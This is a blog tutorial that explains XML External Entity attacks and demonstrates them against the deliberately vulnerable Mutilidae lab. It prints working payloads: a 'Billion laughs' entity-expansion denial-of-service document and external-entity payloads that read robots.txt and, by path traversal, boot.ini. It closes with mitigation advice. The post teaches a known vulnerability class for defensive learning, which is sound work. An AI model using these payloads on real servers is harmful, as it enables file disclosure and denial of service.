A4: 2017 – XML External Entities (XXE)

XML is a very good way to store and to organize data, and XXE vulnerability takes advantage of XML parsers not data itself. It works like every other injection, but has its own features. Overall in my opinion, it’s little more complex than any other injection around.

a4_03


Let’s say we have an application that works with XML. Apps can work with XML directly but they can also parse XML to extract some data for further processing. XML came a long way and one of its features today that it can contain references to another objects. It can be various 3rd party web pages or even a local file system, why not.

So an attacker can put some malicious payload in this external entity and if web application parser doesn’t validate input, this payload will end up in web application and will do some damage. The malicious payload might force your application to execute some system commands, SQL queries or anything else. By the way, many modern XML parsers have their own XXE protection mechanisms.a4_01

Classic XXE attack example called «Billion laughs». Let’s take a closer look at this code here:

<?xml version="1.0"?>
<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ELEMENT lolz (#PCDATA)>
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
 <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
 <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
 <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
 <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
 <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
 <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

When an XML parser loads this XML document, it sees that it includes one base element, «lolz», that contains the text «&lol9;». But «&lol9;» is in fact a defined entity that expands to a string that contains ten «&lol8;» strings. Each of «&lol8;» is also a defined entity that expands to ten «&lol7;» and so on.

So these 15 lines of code are less than a single kilobyte in size but in fact it will contain billion of «lol»s that will take up take about 3 gigabytes of RAM. Dozen of queries like this and your server is down.

In Mutilidae we have a dedicated section for A4 – «XML External Entities» > «XML External Entry Injection» > «XML Validator». Let’s type a simple XML to get an idea of what this page is all about:

<hello> hey! </hello>

and hit «Validate XML». We can see that our XML was submitted and text «Hey» was parsed. Let’s take this:

<?xml version="1.0"?> 
<!DOCTYPE change-log [
	<!ENTITY systemEntity SYSTEM "robots.txt">
]> 
<change-log> 
	<text>&systemEntity;</text>
</change-log>

This example tries to display robots.txt file. And since it has such a privilege, it works:

User-agent: * Disallow: passwords/ Disallow: config.inc Disallow: classes/ Disallow: javascript/ Disallow: owasp-esapi-php/ Disallow: documentation/ Disallow: phpmyadmin/ Disallow: includes/

We have what we came for. It can be a system file just as well, change our XML a little:

<?xml version="1.0"?>
<!DOCTYPE change-log [
	<!ENTITY systemEntity SYSTEM "../../../boot.ini"> 
]>
	<change-log><text>&systemEntity;</text>
</change-log>

And here we go:

[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Server 2012 R2" /fastdetect /NoExecute=OptIn ;

We can try one «Billion laughs» here by the way. Let’s just not laugh too hard and use a much simpler XML. Because otherwise you’ll overload you box in a second:

<?xml version="1.0"?> 
<!DOCTYPE nn [ <!ENTITY ha "Ha !"> 
<!ENTITY ha2 "&ha; &ha;"> 
<!ENTITY ha3 "&ha2; &ha2;"> 
<!ENTITY ha4 "&ha3; &ha3;"> ]> 
<nn>&ha4;</nn>

Output here is:

Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha !

Let’s wrap it up – XML Injections are just as severe as any other type of injections. What can we do about it? Well, obviously we can disable XXE on our server. It might break you web app logic, but hey, let’s work with developers and find an elegant solution. Also we can implement XML validation on server side. It’s a much better way but takes some time. Other thing you can do is to use source code analysis tools. These tools can verify your code and find flaws for you automatically.

a4_02

If nothing helps … maybe its time to stop using XML once and for all.

One thought on “A4: 2017 – XML External Entities (XXE)”

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s